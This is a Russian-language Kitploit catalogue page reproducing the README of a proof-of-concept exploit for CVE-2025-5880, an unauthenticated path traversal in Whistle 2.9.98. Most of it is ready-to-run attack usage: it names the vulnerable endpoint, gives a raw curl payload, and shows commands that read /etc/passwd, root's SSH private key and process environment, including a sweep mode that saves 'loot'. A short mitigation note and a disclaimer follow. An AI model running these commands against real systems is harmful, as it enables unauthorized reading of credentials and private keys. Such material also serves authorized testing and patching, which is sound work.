Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5880-PoC — Эксплойт proof-of-concept для неаутентифицированной уязвимости обхода пути (path traversal) в Whistle v2.9.98. | Kitploit
Инструменты/GitHubGitHub/yacine-rm/cve-2025-5880-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Эксплойт proof-of-concept для неаутентифицированной уязвимости обхода пути (path traversal) в Whistle v2.9.98.

Репозиторий
124 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-5880 — Whistle 2.9.98 Path Traversal PoC

Python CVE CWE License

Эксплойт proof-of-concept для неаутентифицированной уязвимости обхода пути в Whistle v2.9.98.


Сводка по уязвимости

ПолеДетали
CVE IDCVE-2025-5880
CWECWE-22 (Path Traversal)
Затронутое ПОWhistle ≤ 2.9.98
Затронутая конечная точка/cgi-bin/sessions/get-temp-file
Вектор атакиСеть — аутентификация не требуется
ВоздействиеЧтение произвольных файлов в файловой системе хоста

Параметр запроса filename не санитизируется перед использованием для открытия файла на диске, что позволяет атакующему выйти за пределы предполагаемой директории временных файлов и читать любые файлы, к которым процесс Whistle имеет доступ (например, /etc/passwd, /root/.ssh/id_rsa).


Быстрый старт

root@kitploit:~
# Клонирование
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
 
# Без внешних зависимостей
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

Использование

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]
ФлагОписание
-u / --urlБазовый URL цели (например, http://192.168.1.10:8899)
-f / --fileПуть к произвольному файлу для чтения
--presetИменованный ярлык: passwd shadow hosts id_rsa …
--sweepАвтоматически перебрать все пресеты
-o / --outputСохранить результат в файл
--save-dirДиректория для сохранения добычи из --sweep
--timeoutТаймаут HTTP в секундах (по умолчанию 10)

Примеры

root@kitploit:~
# Чтение /etc/passwd
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
 
# Получение приватного SSH-ключа root
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
 
# Чтение произвольного пути
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
 
# Перебор и сохранение всех пресетов
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

Raw PoC (curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

Устранение

Обновите Whistle до версии, которая проверяет и ограничивает параметр filename предполагаемой директорией временных файлов. Примените нормализацию пути по белому списку (например, path.resolve + проверка префикса) на стороне сервера.


Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно и неэтично.
Автор не несёт ответственности за неправомерное использование.

Скачать инструмент